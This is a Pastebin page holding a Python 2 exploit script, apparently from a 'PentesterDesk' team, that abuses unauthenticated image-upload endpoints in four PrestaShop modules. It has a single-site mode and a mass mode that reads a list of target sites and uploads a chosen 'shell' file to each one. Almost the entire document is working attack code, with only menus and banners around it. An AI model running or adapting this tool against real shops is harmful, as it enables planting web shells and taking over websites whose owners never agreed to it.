API tools faq
paste
Advertisement
Guest User

..

a guest
Jan 17th, 2019
110
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.86 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. ####################################################################################
  3. tunisia hacker
  4. ####################################################################################
  5. import sys, os
  6. import time
  7. import requests
  8. def main():
  9. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  10.  
  11. banner = '''
  12.  
  13. +======================================================+
  14. | Prestashop | FileUpload Exp | PentesterDesk |
  15. | Found by : Muhammad Faisal Gunanda |
  16. | Coded by : PentesterDesk Team |
  17. | Contact : pentesterdesk@gmail.com |
  18. +======================================================+
  19. '''
  20. print banner
  21. print "[1] SimpleSlideShow "
  22. print "[2] Productpageadverts"
  23. print "[3] HomepageAdvertise"
  24. print "[4] columnAdverts"
  25. ch1=raw_input("\n[>] ")
  26. #1 SimpleSlideShow
  27. if ch1 == '1':
  28. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  29. print banner
  30. print "\n <==============SimpleSlideShow Exploit=================>\n"
  31. print "[1] Single Site "
  32. print "[2] Mass Upload"
  33. print "[3] GoTo Home"
  34. ch2=raw_input("\n[>] ")
  35. if ch2 == '3':
  36. main()
  37. if ch2 == '1':
  38. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  39. print banner
  40. print "\n <==============SimpleSlideShow Exploit=================>\n"
  41. url = raw_input("[+] Enter Url : ")
  42. filname= raw_input("[+] Enter File : ")
  43. if filname == '' or url == '':
  44. print "\n[!] Url or File is not entered\n"
  45. raw_input("[+] Enter Any key to try agian [>] ")
  46. main()
  47. #url Logic
  48. if '/modules/simpleslideshow/' in url:
  49. url=url.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
  50. elif '/modules/simpleslideshow/uploadimage.php' in url:
  51. url=url
  52. else:
  53. url = url + "/modules/simpleslideshow/uploadimage.php"
  54. #main
  55. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  56. req=requests.post(url,files=files)
  57. if req.status_code == 200 or 'success' in req.text:
  58. url=url.replace('/uploadimage.php','/slides/'+filname)
  59. print ("[+] %s [ok]" % (url))
  60. else:
  61. print "\n[+] %s \n" %url
  62. raw_input("\n[+] Press Enter [>] ")
  63. main()
  64. #Mass upload Logic
  65. if ch2 == '2':
  66. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  67. print banner
  68. print "\n <==============SimpleSlideShow Exploit=================>\n"
  69. filee = raw_input("[+] Enter List Name : ")
  70. filname= raw_input("[+] Enter Shell Name : ")
  71. if filname == '' or filee == '':
  72. print "\n[!] Url or File is not entered\n"
  73. raw_input("[+] Enter Any key to try agian [>] ")
  74. main()
  75. ob = open(filee,'r')
  76. lists = ob.readlines()
  77. list1 = []
  78. i = 0
  79. for i in range(len(lists)):
  80. list1.append(lists[i].strip('\n'))
  81.  
  82. count = 0
  83. for site in (list1):
  84. count = count + 1
  85. if '/modules/simpleslideshow/' in site:
  86. url=site.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
  87. elif '/modules/simpleslideshow/uploadimage.php' in site:
  88. url=site
  89. else:
  90. url = site + "/modules/simpleslideshow/uploadimage.php"
  91. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  92. req=requests.post(url,files=files)
  93. if req.status_code == 200 or 'success' in req.text:
  94. url=url.replace('/uploadimage.php','/slides/'+filname)
  95. print ("[%d] %s [ ok ]" % (count,url))
  96. else:
  97. print ("[%d] %s " % (count,url))
  98. raw_input("\n[+] Press Enter [>] ")
  99. main()
  100.  
  101. #2 productpageadverts
  102. if ch1 == '2':
  103. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  104. print banner
  105. print "\n <==============Productpageadverts Exploit==============>\n"
  106. print "[1] Single Site "
  107. print "[2] Mass Upload"
  108. print "[3] GoTo Home"
  109. ch2=raw_input("\n[>] ")
  110. if ch2 == '3':
  111. main()
  112. if ch2 == '1':
  113. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  114. print banner
  115. print "\n <==============Productpageadverts Exploit==============>\n"
  116. url = raw_input("[+] Enter Url : ")
  117. filname= raw_input("[+] Enter File : ")
  118. if filname == '' or url == '':
  119. print "\n[!] Url or File is not entered\n"
  120. raw_input("[+] Enter Any key to try agian [>] ")
  121. main()
  122. #url Logic
  123. if '/modules/productpageadverts/' in url:
  124. url=url.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
  125. elif '/modules/productpageadverts/uploadimage.php' in url:
  126. url=url
  127. else:
  128. url = url + "/modules/productpageadverts/uploadimage.php"
  129. #main
  130. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  131. req=requests.post(url,files=files)
  132. if req.status_code == 200 or 'success' in req.text:
  133. url=url.replace('/uploadimage.php','/slides/'+filname)
  134. print ("[+] %s [ ok ]" % (url))
  135. else:
  136. print "\n\[+] %s \n" %url
  137. raw_input("\n[+] Press Enter [>] ")
  138. main()
  139. #Mass upload Logic
  140. if ch2 == '2':
  141. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  142. print banner
  143. print "\n <==============Productpageadverts Exploit==============>\n"
  144. filee = raw_input("\033[1;36m[+] Enter List Name : \033[1;m")
  145. filname= raw_input("\033[1;36m[+] Enter Shell Name : \033[1;m")
  146. if filname == '' or filee == '':
  147. print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n"
  148. raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
  149. main()
  150. ob = open(filee,'r')
  151. lists = ob.readlines()
  152. list1 = []
  153. i = 0
  154. for i in range(len(lists)):
  155. list1.append(lists[i].strip('\n'))
  156.  
  157. count = 0
  158. for site in (list1):
  159. count = count + 1
  160. if '/modules/productpageadverts/' in site:
  161. url=site.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
  162. elif '/modules/simpleslideshow/uploadimage.php' in site:
  163. url=site
  164. else:
  165. url = site + "/modules/productpageadverts/uploadimage.php"
  166. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  167. req=requests.post(url,files=files)
  168. if req.status_code == 200 or 'success' in req.text:
  169. url=url.replace('/uploadimage.php','/slides/'+filname)
  170. print ("[%d] %s [ ok ]" % (count,url))
  171. else:
  172. print ("[%d] %s " % (count,url))
  173. raw_input("\n[+] Press Enter [>] ")
  174. main()
  175. #3 homepageadvertise
  176. if ch1 == '3':
  177. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  178. print banner
  179. print "\n <==============HomePageAdvertise Exploit===============>\n"
  180. print "[1] Single Site "
  181. print "[2] Mass Upload"
  182. print "[3] GoTo Home"
  183. ch2=raw_input("\n[>] ")
  184. if ch2 == '3':
  185. main()
  186. if ch2 == '1':
  187. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  188. print banner
  189. print "\n <==============HomePageAdvertise Exploit===============>\n"
  190. url = raw_input("[+] Enter Url : ")
  191. filname= raw_input("[+] Enter File : ")
  192. if filname == '' or url == '':
  193. print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n"
  194. raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
  195. main()
  196. #url Logic
  197. if '/modules/homepageadvertise/' in url:
  198. url=url.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
  199. elif '/modules/homepageadvertise/uploadimage.php' in url:
  200. url=url
  201. else:
  202. url = url + "/modules/homepageadvertise/uploadimage.php"
  203. #main
  204. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  205. req=requests.post(url,files=files)
  206. if req.status_code == 200 or 'success' in req.text:
  207. url=url.replace('/uploadimage.php','/slides/'+filname)
  208. print ("[+] %s [ ok ]" % (url))
  209. else:
  210. print "\n[+] %s \n" %url
  211. raw_input("\n[+] Press Enter [>] ")
  212. main()
  213. #Mass upload Logic
  214. if ch2 == '2':
  215. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  216. print banner
  217. print "\n <==============HomePageAdvertise Exploit===============>\n"
  218. filee = raw_input("[+] Enter List Name : ")
  219. filname= raw_input("[+] Enter Shell Name : ")
  220. if filname == '' or filee == '':
  221. print "\n\[!] Url or File is not entered\n"
  222. raw_input("[+] Enter Any key to try agian [>] ")
  223. main()
  224. ob = open(filee,'r')
  225. lists = ob.readlines()
  226. list1 = []
  227. i = 0
  228. for i in range(len(lists)):
  229. list1.append(lists[i].strip('\n'))
  230.  
  231. count = 0
  232. for site in (list1):
  233. count = count + 1
  234. if '/modules/homepageadvertise/' in site:
  235. url=site.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
  236. elif '/modules/homepageadvertise/uploadimage.php' in site:
  237. url=site
  238. else:
  239. url = site + "/modules/homepageadvertise/uploadimage.php"
  240. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  241. req=requests.post(url,files=files)
  242. if req.status_code == 200 or 'success' in req.text:
  243. url=url.replace('/uploadimage.php','/slides/'+filname)
  244. print ("[%d]] %s [ ok ]" % (count,url))
  245. else:
  246. print ("[%d] %s " % (count,url))
  247. raw_input("\n[+] Press Enter [>] ")
  248. main()
  249. #4 columnadverts
  250. if ch1 == '4':
  251. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  252. print banner
  253. print "\n <================ColumnAdvers Exploit==================>\n"
  254. print "[1] Single Site "
  255. print "[2] Mass Upload"
  256. print "[3] GoTo Home"
  257. ch2=raw_input("\n[>] ")
  258. if ch2 == '3':
  259. main()
  260. if ch2 == '1':
  261. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  262. print banner
  263. print "\n <================ColumnAdvers Exploit==================>\n"
  264. url = raw_input("[+] Enter Url : ")
  265. filname= raw_input("[+] Enter File : ")
  266. if filname == '' or url == '':
  267. print "\n[!] Url or File is not entered\n"
  268. raw_input("[+] Enter Any key to try agian [>] ")
  269. main()
  270. #url Logic
  271. if '/modules/columnadverts/' in url:
  272. url=url.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
  273. elif '/modules/columnadverts/uploadimage.php' in url:
  274. url=url
  275. else:
  276. url = url + "/modules/columnadverts/uploadimage.php"
  277. #main
  278. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  279. req=requests.post(url,files=files)
  280. if req.status_code == 200 or 'success' in req.text:
  281. url=url.replace('/uploadimage.php','/slides/'+filname)
  282. print ("[+] %s [ ok ]" % (url))
  283. else:
  284. print "\n[+] %s \n" %url
  285. raw_input("\n[+] Press Enter [>] ")
  286. main()
  287. #Mass upload Logic
  288. if ch2 == '2':
  289. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  290. print banner
  291. print "\n <================ColumnAdvers Exploit==================>\n"
  292. filee = raw_input("[+] Enter List Name : ")
  293. filname= raw_input("[+] Enter Shell Name : ")
  294. if filname == '' or filee == '':
  295. print "\n[!] Url or File is not entered\n"
  296. raw_input("[+] Enter Any key to try agian [>] ")
  297. main()
  298. ob = open(filee,'r')
  299. lists = ob.readlines()
  300. list1 = []
  301. i = 0
  302. for i in range(len(lists)):
  303. list1.append(lists[i].strip('\n'))
  304.  
  305. count = 0
  306. for site in (list1):
  307. count = count + 1
  308. if '/modules/columnadverts/' in site:
  309. url=site.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
  310. elif '/modules/columnadverts/uploadimage.php' in site:
  311. url=site
  312. else:
  313. url = site + "/modules/columnadverts/uploadimage.php"
  314. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  315. req=requests.post(url,files=files)
  316. if req.status_code == 200 or 'success' in req.text:
  317. url=url.replace('/uploadimage.php','/slides/'+filname)
  318. print ("[%d] %s [ ok ]" % (count,url))
  319. else:
  320. print ("[%d] %s " % (count,url))
  321. raw_input("\n[+] Press Enter [>] ")
  322. main()
  323. if __name__ == "__main__":
  324. main()
  325.  
  326. # love you #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!